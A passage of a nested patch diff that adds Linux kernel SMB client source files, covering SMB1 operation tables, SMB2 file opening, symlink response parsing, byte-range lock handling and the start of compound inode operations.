++	iov[1].iov_len = sizeof(struct win_dev);
++	if (S_ISCHR(mode)) {
++		memcpy(pdev->type, "IntxCHR", 8);
++		pdev->major = cpu_to_le64(MAJOR(dev));
++		pdev->minor = cpu_to_le64(MINOR(dev));
++		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
++							&bytes_written, iov, 1);
++	} else if (S_ISBLK(mode)) {
++		memcpy(pdev->type, "IntxBLK", 8);
++		pdev->major = cpu_to_le64(MAJOR(dev));
++		pdev->minor = cpu_to_le64(MINOR(dev));
++		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
++							&bytes_written, iov, 1);
++	}
++	tcon->ses->server->ops->close(xid, tcon, &fid);
++	d_drop(dentry);
++
++	/* FIXME: add code here to set EAs */
++
++	cifs_free_open_info(&buf);
++	return rc;
++}
++
++
++
++struct smb_version_operations smb1_operations = {
++	.send_cancel = send_nt_cancel,
++	.compare_fids = cifs_compare_fids,
++	.setup_request = cifs_setup_request,
++	.setup_async_request = cifs_setup_async_request,
++	.check_receive = cifs_check_receive,
++	.add_credits = cifs_add_credits,
++	.set_credits = cifs_set_credits,
++	.get_credits_field = cifs_get_credits_field,
++	.get_credits = cifs_get_credits,
++	.wait_mtu_credits = cifs_wait_mtu_credits,
++	.get_next_mid = cifs_get_next_mid,
++	.read_data_offset = cifs_read_data_offset,
++	.read_data_length = cifs_read_data_length,
++	.map_error = map_smb_to_linux_error,
++	.find_mid = cifs_find_mid,
++	.check_message = checkSMB,
++	.dump_detail = cifs_dump_detail,
++	.clear_stats = cifs_clear_stats,
++	.print_stats = cifs_print_stats,
++	.is_oplock_break = is_valid_oplock_break,
++	.downgrade_oplock = cifs_downgrade_oplock,
++	.check_trans2 = cifs_check_trans2,
++	.need_neg = cifs_need_neg,
++	.negotiate = cifs_negotiate,
++	.negotiate_wsize = cifs_negotiate_wsize,
++	.negotiate_rsize = cifs_negotiate_rsize,
++	.sess_setup = CIFS_SessSetup,
++	.logoff = CIFSSMBLogoff,
++	.tree_connect = CIFSTCon,
++	.tree_disconnect = CIFSSMBTDis,
++	.get_dfs_refer = CIFSGetDFSRefer,
++	.qfs_tcon = cifs_qfs_tcon,
++	.is_path_accessible = cifs_is_path_accessible,
++	.can_echo = cifs_can_echo,
++	.query_path_info = cifs_query_path_info,
++	.query_file_info = cifs_query_file_info,
++	.get_srv_inum = cifs_get_srv_inum,
++	.set_path_size = CIFSSMBSetEOF,
++	.set_file_size = CIFSSMBSetFileSize,
++	.set_file_info = smb_set_file_info,
++	.set_compression = cifs_set_compression,
++	.echo = CIFSSMBEcho,
++	.mkdir = CIFSSMBMkDir,
++	.mkdir_setinfo = cifs_mkdir_setinfo,
++	.rmdir = CIFSSMBRmDir,
++	.unlink = CIFSSMBDelFile,
++	.rename_pending_delete = cifs_rename_pending_delete,
++	.rename = CIFSSMBRename,
++	.create_hardlink = CIFSCreateHardLink,
++	.query_symlink = cifs_query_symlink,
++	.open = cifs_open_file,
++	.set_fid = cifs_set_fid,
++	.close = cifs_close_file,
++	.flush = cifs_flush_file,
++	.async_readv = cifs_async_readv,
++	.async_writev = cifs_async_writev,
++	.sync_read = cifs_sync_read,
++	.sync_write = cifs_sync_write,
++	.query_dir_first = cifs_query_dir_first,
++	.query_dir_next = cifs_query_dir_next,
++	.close_dir = cifs_close_dir,
++	.calc_smb_size = smbCalcSize,
++	.oplock_response = cifs_oplock_response,
++	.queryfs = cifs_queryfs,
++	.mand_lock = cifs_mand_lock,
++	.mand_unlock_range = cifs_unlock_range,
++	.push_mand_locks = cifs_push_mandatory_locks,
++	.query_mf_symlink = cifs_query_mf_symlink,
++	.create_mf_symlink = cifs_create_mf_symlink,
++	.is_read_op = cifs_is_read_op,
++	.wp_retry_size = cifs_wp_retry_size,
++	.dir_needs_close = cifs_dir_needs_close,
++	.select_sectype = cifs_select_sectype,
++#ifdef CONFIG_CIFS_XATTR
++	.query_all_EAs = CIFSSMBQAllEAs,
++	.set_EA = CIFSSMBSetEA,
++#endif /* CIFS_XATTR */
++	.get_acl = get_cifs_acl,
++	.get_acl_by_fid = get_cifs_acl_by_fid,
++	.set_acl = set_cifs_acl,
++	.make_node = cifs_make_node,
++};
++
++struct smb_version_values smb1_values = {
++	.version_string = SMB1_VERSION_STRING,
++	.protocol_id = SMB10_PROT_ID,
++	.large_lock_type = LOCKING_ANDX_LARGE_FILES,
++	.exclusive_lock_type = 0,
++	.shared_lock_type = LOCKING_ANDX_SHARED_LOCK,
++	.unlock_lock_type = 0,
++	.header_preamble_size = 4,
++	.header_size = sizeof(struct smb_hdr),
++	.max_header_size = MAX_CIFS_HDR_SIZE,
++	.read_rsp_size = sizeof(READ_RSP),
++	.lock_cmd = cpu_to_le16(SMB_COM_LOCKING_ANDX),
++	.cap_unix = CAP_UNIX,
++	.cap_nt_find = CAP_NT_SMBS | CAP_NT_FIND,
++	.cap_large_files = CAP_LARGE_FILES,
++	.signing_enabled = SECMODE_SIGN_ENABLED,
++	.signing_required = SECMODE_SIGN_REQUIRED,
++};
+diff --git a/fs/smb/client/smb2file.c b/fs/smb/client/smb2file.c
+new file mode 100644
+index 0000000000000..ba6cc50af390f
+--- /dev/null
++++ b/fs/smb/client/smb2file.c
+@@ -0,0 +1,371 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002, 2011
++ *   Author(s): Steve French (sfrench@us.ibm.com),
++ *              Pavel Shilovsky ((pshilovsky@samba.org) 2012
++ *
++ */
++#include <linux/fs.h>
++#include <linux/stat.h>
++#include <linux/slab.h>
++#include <linux/pagemap.h>
++#include <asm/div64.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "cifs_unicode.h"
++#include "fscache.h"
++#include "smb2proto.h"
++#include "smb2status.h"
++
++static struct smb2_symlink_err_rsp *symlink_data(const struct kvec *iov)
++{
++	struct smb2_err_rsp *err = iov->iov_base;
++	struct smb2_symlink_err_rsp *sym = ERR_PTR(-EINVAL);
++	u32 len;
++
++	if (err->ErrorContextCount) {
++		struct smb2_error_context_rsp *p, *end;
++
++		len = (u32)err->ErrorContextCount * (offsetof(struct smb2_error_context_rsp,
++							      ErrorContextData) +
++						     sizeof(struct smb2_symlink_err_rsp));
++		if (le32_to_cpu(err->ByteCount) < len || iov->iov_len < len + sizeof(*err))
++			return ERR_PTR(-EINVAL);
++
++		p = (struct smb2_error_context_rsp *)err->ErrorData;
++		end = (struct smb2_error_context_rsp *)((u8 *)err + iov->iov_len);
++		do {
++			if (le32_to_cpu(p->ErrorId) == SMB2_ERROR_ID_DEFAULT) {
++				sym = (struct smb2_symlink_err_rsp *)&p->ErrorContextData;
++				break;
++			}
++			cifs_dbg(FYI, "%s: skipping unhandled error context: 0x%x\n",
++				 __func__, le32_to_cpu(p->ErrorId));
++
++			len = ALIGN(le32_to_cpu(p->ErrorDataLength), 8);
++			p = (struct smb2_error_context_rsp *)((u8 *)&p->ErrorContextData + len);
++		} while (p < end);
++	} else if (le32_to_cpu(err->ByteCount) >= sizeof(*sym) &&
++		   iov->iov_len >= SMB2_SYMLINK_STRUCT_SIZE) {
++		sym = (struct smb2_symlink_err_rsp *)err->ErrorData;
++	}
++
++	if (!IS_ERR(sym) && (le32_to_cpu(sym->SymLinkErrorTag) != SYMLINK_ERROR_TAG ||
++			     le32_to_cpu(sym->ReparseTag) != IO_REPARSE_TAG_SYMLINK))
++		sym = ERR_PTR(-EINVAL);
++
++	return sym;
++}
++
++int smb2_parse_symlink_response(struct cifs_sb_info *cifs_sb, const struct kvec *iov, char **path)
++{
++	struct smb2_symlink_err_rsp *sym;
++	unsigned int sub_offs, sub_len;
++	unsigned int print_offs, print_len;
++	char *s;
++
++	if (!cifs_sb || !iov || !iov->iov_base || !iov->iov_len || !path)
++		return -EINVAL;
++
++	sym = symlink_data(iov);
++	if (IS_ERR(sym))
++		return PTR_ERR(sym);
++
++	sub_len = le16_to_cpu(sym->SubstituteNameLength);
++	sub_offs = le16_to_cpu(sym->SubstituteNameOffset);
++	print_len = le16_to_cpu(sym->PrintNameLength);
++	print_offs = le16_to_cpu(sym->PrintNameOffset);
++
++	if (iov->iov_len < SMB2_SYMLINK_STRUCT_SIZE + sub_offs + sub_len ||
++	    iov->iov_len < SMB2_SYMLINK_STRUCT_SIZE + print_offs + print_len)
++		return -EINVAL;
++
++	s = cifs_strndup_from_utf16((char *)sym->PathBuffer + sub_offs, sub_len, true,
++				    cifs_sb->local_nls);
++	if (!s)
++		return -ENOMEM;
++	convert_delimiter(s, '/');
++	cifs_dbg(FYI, "%s: symlink target: %s\n", __func__, s);
++
++	*path = s;
++	return 0;
++}
++
++int smb2_open_file(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock, void *buf)
++{
++	int rc;
++	__le16 *smb2_path;
++	__u8 smb2_oplock;
++	struct cifs_open_info_data *data = buf;
++	struct smb2_file_all_info file_info = {};
++	struct smb2_file_all_info *smb2_data = data ? &file_info : NULL;
++	struct kvec err_iov = {};
++	int err_buftype = CIFS_NO_BUFFER;
++	struct cifs_fid *fid = oparms->fid;
++	struct network_resiliency_req nr_ioctl_req;
++
++	smb2_path = cifs_convert_path_to_utf16(oparms->path, oparms->cifs_sb);
++	if (smb2_path == NULL)
++		return -ENOMEM;
++
++	oparms->desired_access |= FILE_READ_ATTRIBUTES;
++	smb2_oplock = SMB2_OPLOCK_LEVEL_BATCH;
++
++	rc = SMB2_open(xid, oparms, smb2_path, &smb2_oplock, smb2_data, NULL, &err_iov,
++		       &err_buftype);
++	if (rc && data) {
++		struct smb2_hdr *hdr = err_iov.iov_base;
++
++		if (unlikely(!err_iov.iov_base || err_buftype == CIFS_NO_BUFFER))
++			goto out;
++		if (hdr->Status == STATUS_STOPPED_ON_SYMLINK) {
++			rc = smb2_parse_symlink_response(oparms->cifs_sb, &err_iov,
++							 &data->symlink_target);
++			if (!rc) {
++				memset(smb2_data, 0, sizeof(*smb2_data));
++				oparms->create_options |= OPEN_REPARSE_POINT;
++				rc = SMB2_open(xid, oparms, smb2_path, &smb2_oplock, smb2_data,
++					       NULL, NULL, NULL);
++				oparms->create_options &= ~OPEN_REPARSE_POINT;
++			}
++		}
++	}
++
++	if (rc)
++		goto out;
++
++	if (oparms->tcon->use_resilient) {
++		/* default timeout is 0, servers pick default (120 seconds) */
++		nr_ioctl_req.Timeout =
++			cpu_to_le32(oparms->tcon->handle_timeout);
++		nr_ioctl_req.Reserved = 0;
++		rc = SMB2_ioctl(xid, oparms->tcon, fid->persistent_fid,
++			fid->volatile_fid, FSCTL_LMR_REQUEST_RESILIENCY,
++			(char *)&nr_ioctl_req, sizeof(nr_ioctl_req),
++			CIFSMaxBufSize, NULL, NULL /* no return info */);
++		if (rc == -EOPNOTSUPP) {
++			cifs_dbg(VFS,
++			     "resiliency not supported by server, disabling\n");
++			oparms->tcon->use_resilient = false;
++		} else if (rc)
++			cifs_dbg(FYI, "error %d setting resiliency\n", rc);
++
++		rc = 0;
++	}
++
++	if (smb2_data) {
++		/* if open response does not have IndexNumber field - get it */
++		if (smb2_data->IndexNumber == 0) {
++			rc = SMB2_get_srv_num(xid, oparms->tcon,
++				      fid->persistent_fid,
++				      fid->volatile_fid,
++				      &smb2_data->IndexNumber);
++			if (rc) {
++				/*
++				 * let get_inode_info disable server inode
++				 * numbers
++				 */
++				smb2_data->IndexNumber = 0;
++				rc = 0;
++			}
++		}
++		memcpy(&data->fi, smb2_data, sizeof(data->fi));
++	}
++
++	*oplock = smb2_oplock;
++out:
++	free_rsp_buf(err_buftype, err_iov.iov_base);
++	kfree(smb2_path);
++	return rc;
++}
++
++int
++smb2_unlock_range(struct cifsFileInfo *cfile, struct file_lock *flock,
++		  const unsigned int xid)
++{
++	int rc = 0, stored_rc;
++	unsigned int max_num, num = 0, max_buf;
++	struct smb2_lock_element *buf, *cur;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	struct cifsLockInfo *li, *tmp;
++	__u64 length = 1 + flock->fl_end - flock->fl_start;
++	struct list_head tmp_llist;
++
++	INIT_LIST_HEAD(&tmp_llist);
++
++	/*
++	 * Accessing maxBuf is racy with cifs_reconnect - need to store value
++	 * and check it before using.
++	 */
++	max_buf = tcon->ses->server->maxBuf;
++	if (max_buf < sizeof(struct smb2_lock_element))
++		return -EINVAL;
++
++	BUILD_BUG_ON(sizeof(struct smb2_lock_element) > PAGE_SIZE);
++	max_buf = min_t(unsigned int, max_buf, PAGE_SIZE);
++	max_num = max_buf / sizeof(struct smb2_lock_element);
++	buf = kcalloc(max_num, sizeof(struct smb2_lock_element), GFP_KERNEL);
++	if (!buf)
++		return -ENOMEM;
++
++	cur = buf;
++
++	cifs_down_write(&cinode->lock_sem);
++	list_for_each_entry_safe(li, tmp, &cfile->llist->locks, llist) {
++		if (flock->fl_start > li->offset ||
++		    (flock->fl_start + length) <
++		    (li->offset + li->length))
++			continue;
++		if (current->tgid != li->pid)
++			/*
++			 * flock and OFD lock are associated with an open
++			 * file description, not the process.
++			 */
++			if (!(flock->fl_flags & (FL_FLOCK | FL_OFDLCK)))
++				continue;
++		if (cinode->can_cache_brlcks) {
++			/*
++			 * We can cache brlock requests - simply remove a lock
++			 * from the file's list.
++			 */
++			list_del(&li->llist);
++			cifs_del_lock_waiters(li);
++			kfree(li);
++			continue;
++		}
++		cur->Length = cpu_to_le64(li->length);
++		cur->Offset = cpu_to_le64(li->offset);
++		cur->Flags = cpu_to_le32(SMB2_LOCKFLAG_UNLOCK);
++		/*
++		 * We need to save a lock here to let us add it again to the
++		 * file's list if the unlock range request fails on the server.
++		 */
++		list_move(&li->llist, &tmp_llist);
++		if (++num == max_num) {
++			stored_rc = smb2_lockv(xid, tcon,
++					       cfile->fid.persistent_fid,
++					       cfile->fid.volatile_fid,
++					       current->tgid, num, buf);
++			if (stored_rc) {
++				/*
++				 * We failed on the unlock range request - add
++				 * all locks from the tmp list to the head of
++				 * the file's list.
++				 */
++				cifs_move_llist(&tmp_llist,
++						&cfile->llist->locks);
++				rc = stored_rc;
++			} else
++				/*
++				 * The unlock range request succeed - free the
++				 * tmp list.
++				 */
++				cifs_free_llist(&tmp_llist);
++			cur = buf;
++			num = 0;
++		} else
++			cur++;
++	}
++	if (num) {
++		stored_rc = smb2_lockv(xid, tcon, cfile->fid.persistent_fid,
++				       cfile->fid.volatile_fid, current->tgid,
++				       num, buf);
++		if (stored_rc) {
++			cifs_move_llist(&tmp_llist, &cfile->llist->locks);
++			rc = stored_rc;
++		} else
++			cifs_free_llist(&tmp_llist);
++	}
++	up_write(&cinode->lock_sem);
++
++	kfree(buf);
++	return rc;
++}
++
++static int
++smb2_push_mand_fdlocks(struct cifs_fid_locks *fdlocks, const unsigned int xid,
++		       struct smb2_lock_element *buf, unsigned int max_num)
++{
++	int rc = 0, stored_rc;
++	struct cifsFileInfo *cfile = fdlocks->cfile;
++	struct cifsLockInfo *li;
++	unsigned int num = 0;
++	struct smb2_lock_element *cur = buf;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++
++	list_for_each_entry(li, &fdlocks->locks, llist) {
++		cur->Length = cpu_to_le64(li->length);
++		cur->Offset = cpu_to_le64(li->offset);
++		cur->Flags = cpu_to_le32(li->type |
++						SMB2_LOCKFLAG_FAIL_IMMEDIATELY);
++		if (++num == max_num) {
++			stored_rc = smb2_lockv(xid, tcon,
++					       cfile->fid.persistent_fid,
++					       cfile->fid.volatile_fid,
++					       current->tgid, num, buf);
++			if (stored_rc)
++				rc = stored_rc;
++			cur = buf;
++			num = 0;
++		} else
++			cur++;
++	}
++	if (num) {
++		stored_rc = smb2_lockv(xid, tcon,
++				       cfile->fid.persistent_fid,
++				       cfile->fid.volatile_fid,
++				       current->tgid, num, buf);
++		if (stored_rc)
++			rc = stored_rc;
++	}
++
++	return rc;
++}
++
++int
++smb2_push_mandatory_locks(struct cifsFileInfo *cfile)
++{
++	int rc = 0, stored_rc;
++	unsigned int xid;
++	unsigned int max_num, max_buf;
++	struct smb2_lock_element *buf;
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	struct cifs_fid_locks *fdlocks;
++
++	xid = get_xid();
++
++	/*
++	 * Accessing maxBuf is racy with cifs_reconnect - need to store value
++	 * and check it for zero before using.
++	 */
++	max_buf = tlink_tcon(cfile->tlink)->ses->server->maxBuf;
++	if (max_buf < sizeof(struct smb2_lock_element)) {
++		free_xid(xid);
++		return -EINVAL;
++	}
++
++	BUILD_BUG_ON(sizeof(struct smb2_lock_element) > PAGE_SIZE);
++	max_buf = min_t(unsigned int, max_buf, PAGE_SIZE);
++	max_num = max_buf / sizeof(struct smb2_lock_element);
++	buf = kcalloc(max_num, sizeof(struct smb2_lock_element), GFP_KERNEL);
++	if (!buf) {
++		free_xid(xid);
++		return -ENOMEM;
++	}
++
++	list_for_each_entry(fdlocks, &cinode->llist, llist) {
++		stored_rc = smb2_push_mand_fdlocks(fdlocks, xid, buf, max_num);
++		if (stored_rc)
++			rc = stored_rc;
++	}
++
++	kfree(buf);
++	free_xid(xid);
++	return rc;
++}
+diff --git a/fs/smb/client/smb2glob.h b/fs/smb/client/smb2glob.h
+new file mode 100644
+index 0000000000000..82e916ad167c0
+--- /dev/null
++++ b/fs/smb/client/smb2glob.h
+@@ -0,0 +1,44 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Definitions for various global variables and structures
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002, 2011
++ *                 Etersoft, 2012
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *              Jeremy Allison (jra@samba.org)
++ *              Pavel Shilovsky (pshilovsky@samba.org) 2012
++ *
++ */
++#ifndef _SMB2_GLOB_H
++#define _SMB2_GLOB_H
++
++/*
++ *****************************************************************
++ * Constants go here
++ *****************************************************************
++ */
++
++/*
++ * Identifiers for functions that use the open, operation, close pattern
++ * in smb2inode.c:smb2_compound_op()
++ */
++#define SMB2_OP_SET_DELETE 1
++#define SMB2_OP_SET_INFO 2
++#define SMB2_OP_QUERY_INFO 3
++#define SMB2_OP_QUERY_DIR 4
++#define SMB2_OP_MKDIR 5
++#define SMB2_OP_RENAME 6
++#define SMB2_OP_DELETE 7
++#define SMB2_OP_HARDLINK 8
++#define SMB2_OP_SET_EOF 9
++#define SMB2_OP_RMDIR 10
++#define SMB2_OP_POSIX_QUERY_INFO 11
++
++/* Used when constructing chained read requests. */
++#define CHAINED_REQUEST 1
++#define START_OF_CHAIN 2
++#define END_OF_CHAIN 4
++#define RELATED_REQUEST 8
++
++#endif	/* _SMB2_GLOB_H */
+diff --git a/fs/smb/client/smb2inode.c b/fs/smb/client/smb2inode.c
+new file mode 100644
+index 0000000000000..c97e049e29dd3
+--- /dev/null
++++ b/fs/smb/client/smb2inode.c
+@@ -0,0 +1,799 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002, 2011
++ *                 Etersoft, 2012
++ *   Author(s): Pavel Shilovsky (pshilovsky@samba.org),
++ *              Steve French (sfrench@us.ibm.com)
++ *
++ */
++#include <linux/fs.h>
++#include <linux/stat.h>
++#include <linux/slab.h>
++#include <linux/pagemap.h>
++#include <asm/div64.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "cifs_unicode.h"
++#include "fscache.h"
++#include "smb2glob.h"
++#include "smb2pdu.h"
++#include "smb2proto.h"
++#include "cached_dir.h"
++#include "smb2status.h"
++
++static void
++free_set_inf_compound(struct smb_rqst *rqst)
++{
++	if (rqst[1].rq_iov)
++		SMB2_set_info_free(&rqst[1]);
++	if (rqst[2].rq_iov)
++		SMB2_close_free(&rqst[2]);
++}
++
++
++struct cop_vars {
++	struct cifs_open_parms oparms;
++	struct kvec rsp_iov[3];
++	struct smb_rqst rqst[3];
++	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
++	struct kvec qi_iov[1];
++	struct kvec si_iov[SMB2_SET_INFO_IOV_SIZE];
++	struct kvec close_iov[1];
++	struct smb2_file_rename_info rename_info;
++	struct smb2_file_link_info link_info;
++};
++
++/*
++ * note: If cfile is passed, the reference to it is dropped here.
++ * So make sure that you do not reuse cfile after return from this func.
++ *
++ * If passing @err_iov and @err_buftype, ensure to make them both large enough (>= 3) to hold all
++ * error responses.  Caller is also responsible for freeing them up.
++ */
++static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
++			    struct cifs_sb_info *cifs_sb, const char *full_path,
++			    __u32 desired_access, __u32 create_disposition, __u32 create_options,
++			    umode_t mode, void *ptr, int command, struct cifsFileInfo *cfile,
++			    struct kvec *err_iov, int *err_buftype)
++{
++	struct cop_vars *vars = NULL;
++	struct kvec *rsp_iov;
++	struct smb_rqst *rqst;
++	int rc;
++	__le16 *utf16_path = NULL;
++	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_fid fid;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server;
++	int num_rqst = 0;
++	int resp_buftype[3];
++	struct smb2_query_info_rsp *qi_rsp = NULL;
++	struct cifs_open_info_data *idata;
++	int flags = 0;
++	__u8 delete_pending[8] = {1, 0, 0, 0, 0, 0, 0, 0};
++	unsigned int size[2];
++	void *data[2];
++	int len;
++
++	vars = kzalloc(sizeof(*vars), GFP_ATOMIC);
++	if (vars == NULL)
++		return -ENOMEM;
++	rqst = &vars->rqst[0];
++	rsp_iov = &vars->rsp_iov[0];
++
++	server = cifs_pick_channel(ses);
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
++
++	/* We already have a handle so we can skip the open */
++	if (cfile)
++		goto after_open;
++
++	/* Open */
++	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
++	if (!utf16_path) {
++		rc = -ENOMEM;
++		goto finished;
++	}
++
++	vars->oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = full_path,
++		.desired_access = desired_access,
++		.disposition = create_disposition,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++		.mode = mode,
++		.cifs_sb = cifs_sb,
++	};
++
++	rqst[num_rqst].rq_iov = &vars->open_iov[0];
++	rqst[num_rqst].rq_nvec = SMB2_CREATE_IOV_SIZE;
++	rc = SMB2_open_init(tcon, server,
++			    &rqst[num_rqst], &oplock, &vars->oparms,
++			    utf16_path);
++	kfree(utf16_path);
++	if (rc)
++		goto finished;
++
++	smb2_set_next_command(tcon, &rqst[num_rqst]);
++ after_open:
++	num_rqst++;
++	rc = 0;
++
++	/* Operation */
++	switch (command) {
++	case SMB2_OP_QUERY_INFO:
++		rqst[num_rqst].rq_iov = &vars->qi_iov[0];
++		rqst[num_rqst].rq_nvec = 1;
++
++		if (cfile)
++			rc = SMB2_query_info_init(tcon, server,
++				&rqst[num_rqst],
++				cfile->fid.persistent_fid,
++				cfile->fid.volatile_fid,
++				FILE_ALL_INFORMATION,
++				SMB2_O_INFO_FILE, 0,
++				sizeof(struct smb2_file_all_info) +
++					  PATH_MAX * 2, 0, NULL);
++		else {
++			rc = SMB2_query_info_init(tcon, server,
++				&rqst[num_rqst],
++				COMPOUND_FID,
++				COMPOUND_FID,
++				FILE_ALL_INFORMATION,
++				SMB2_O_INFO_FILE, 0,
++				sizeof(struct smb2_file_all_info) +
++					  PATH_MAX * 2, 0, NULL);
++			if (!rc) {
++				smb2_set_next_command(tcon, &rqst[num_rqst]);
++				smb2_set_related(&rqst[num_rqst]);
++			}
++		}
++
++		if (rc)
++			goto finished;
++		num_rqst++;
++		trace_smb3_query_info_compound_enter(xid, ses->Suid, tcon->tid,
++						     full_path);
++		break;
++	case SMB2_OP_POSIX_QUERY_INFO:
++		rqst[num_rqst].rq_iov = &vars->qi_iov[0];
++		rqst[num_rqst].rq_nvec = 1;
++
++		if (cfile)
++			rc = SMB2_query_info_init(tcon, server,
++				&rqst[num_rqst],
++				cfile->fid.persistent_fid,
++				cfile->fid.volatile_fid,
++				SMB_FIND_FILE_POSIX_INFO,
++				SMB2_O_INFO_FILE, 0,
++				/* TBD: fix following to allow for longer SIDs */
++				sizeof(struct smb311_posix_qinfo *) + (PATH_MAX * 2) +
++				(sizeof(struct cifs_sid) * 2), 0, NULL);
++		else {
++			rc = SMB2_query_info_init(tcon, server,
++				&rqst[num_rqst],
++				COMPOUND_FID,
++				COMPOUND_FID,
++				SMB_FIND_FILE_POSIX_INFO,
++				SMB2_O_INFO_FILE, 0,
++				sizeof(struct smb311_posix_qinfo *) + (PATH_MAX * 2) +
++				(sizeof(struct cifs_sid) * 2), 0, NULL);
++			if (!rc) {
++				smb2_set_next_command(tcon, &rqst[num_rqst]);
++				smb2_set_related(&rqst[num_rqst]);
++			}
++		}
++
++		if (rc)
++			goto finished;
++		num_rqst++;
++		trace_smb3_posix_query_info_compound_enter(xid, ses->Suid, tcon->tid, full_path);
++		break;
++	case SMB2_OP_DELETE:
++		trace_smb3_delete_enter(xid, ses->Suid, tcon->tid, full_path);
++		break;
++	case SMB2_OP_MKDIR:
++		/*
++		 * Directories are created through parameters in the
++		 * SMB2_open() call.
++		 */
++		trace_smb3_mkdir_enter(xid, ses->Suid, tcon->tid, full_path);
++		break;
++	case SMB2_OP_RMDIR:
++		rqst[num_rqst].rq_iov = &vars->si_iov[0];
++		rqst[num_rqst].rq_nvec = 1;
++
++		size[0] = 1; /* sizeof __u8 See MS-FSCC section 2.4.11 */
++		data[0] = &delete_pending[0];
++
++		rc = SMB2_set_info_init(tcon, server,
++					&rqst[num_rqst], COMPOUND_FID,
++					COMPOUND_FID, current->tgid,
++					FILE_DISPOSITION_INFORMATION,
++					SMB2_O_INFO_FILE, 0, data, size);
++		if (rc)
++			goto finished;
++		smb2_set_next_command(tcon, &rqst[num_rqst]);
++		smb2_set_related(&rqst[num_rqst++]);
++		trace_smb3_rmdir_enter(xid, ses->Suid, tcon->tid, full_path);
++		break;
++	case SMB2_OP_SET_EOF:
++		rqst[num_rqst].rq_iov = &vars->si_iov[0];
++		rqst[num_rqst].rq_nvec = 1;
++
++		size[0] = 8; /* sizeof __le64 */
++		data[0] = ptr;
++
++		if (cfile) {
++			rc = SMB2_set_info_init(tcon, server,
++						&rqst[num_rqst],
++						cfile->fid.persistent_fid,
++						cfile->fid.volatile_fid,
++						current->tgid,
++						FILE_END_OF_FILE_INFORMATION,
++						SMB2_O_INFO_FILE, 0,
++						data, size);
++		} else {
++			rc = SMB2_set_info_init(tcon, server,
++						&rqst[num_rqst],
++						COMPOUND_FID,
++						COMPOUND_FID,
++						current->tgid,
++						FILE_END_OF_FILE_INFORMATION,
++						SMB2_O_INFO_FILE, 0,
++						data, size);
++			if (!rc) {
++				smb2_set_next_command(tcon, &rqst[num_rqst]);
++				smb2_set_related(&rqst[num_rqst]);
++			}
++		}
++		if (rc)
++			goto finished;
++		num_rqst++;
++		trace_smb3_set_eof_enter(xid, ses->Suid, tcon->tid, full_path);
++		break;
++	case SMB2_OP_SET_INFO:
++		rqst[num_rqst].rq_iov = &vars->si_iov[0];
++		rqst[num_rqst].rq_nvec = 1;
++
++
++		size[0] = sizeof(FILE_BASIC_INFO);
++		data[0] = ptr;
++
++		if (cfile)
++			rc = SMB2_set_info_init(tcon, server,
++				&rqst[num_rqst],
++				cfile->fid.persistent_fid,
++				cfile->fid.volatile_fid, current->tgid,
++				FILE_BASIC_INFORMATION,
++				SMB2_O_INFO_FILE, 0, data, size);
++		else {
++			rc = SMB2_set_info_init(tcon, server,
++				&rqst[num_rqst],
++				COMPOUND_FID,
++				COMPOUND_FID, current->tgid,
++				FILE_BASIC_INFORMATION,
++				SMB2_O_INFO_FILE, 0, data, size);
++			if (!rc) {
++				smb2_set_next_command(tcon, &rqst[num_rqst]);
++				smb2_set_related(&rqst[num_rqst]);
++			}
++		}
++
++		if (rc)
++			goto finished;
++		num_rqst++;
++		trace_smb3_set_info_compound_enter(xid, ses->Suid, tcon->tid,
++						   full_path);
++		break;
++	case SMB2_OP_RENAME:
++		rqst[num_rqst].rq_iov = &vars->si_iov[0];
++		rqst[num_rqst].rq_nvec = 2;
++
++		len = (2 * UniStrnlen((wchar_t *)ptr, PATH_MAX));
++
++		vars->rename_info.ReplaceIfExists = 1;
++		vars->rename_info.RootDirectory = 0;
++		vars->rename_info.FileNameLength = cpu_to_le32(len);
++
++		size[0] = sizeof(struct smb2_file_rename_info);
++		data[0] = &vars->rename_info;
++
++		size[1] = len + 2 /* null */;
++		data[1] = (__le16 *)ptr;
++
++		if (cfile)
++			rc = SMB2_set_info_init(tcon, server,
++						&rqst[num_rqst],
++						cfile->fid.persistent_fid,
++						cfile->fid.volatile_fid,
++					current->tgid, FILE_RENAME_INFORMATION,
++					SMB2_O_INFO_FILE, 0, data, size);
++		else {
++			rc = SMB2_set_info_init(tcon, server,
++					&rqst[num_rqst],
++					COMPOUND_FID, COMPOUND_FID,
++					current->tgid, FILE_RENAME_INFORMATION,
++					SMB2_O_INFO_FILE, 0, data, size);
++			if (!rc) {
++				smb2_set_next_command(tcon, &rqst[num_rqst]);
++				smb2_set_related(&rqst[num_rqst]);
++			}
++		}
++		if (rc)
++			goto finished;
++		num_rqst++;
++		trace_smb3_rename_enter(xid, ses->Suid, tcon->tid, full_path);
++		break;
++	case SMB2_OP_HARDLINK:
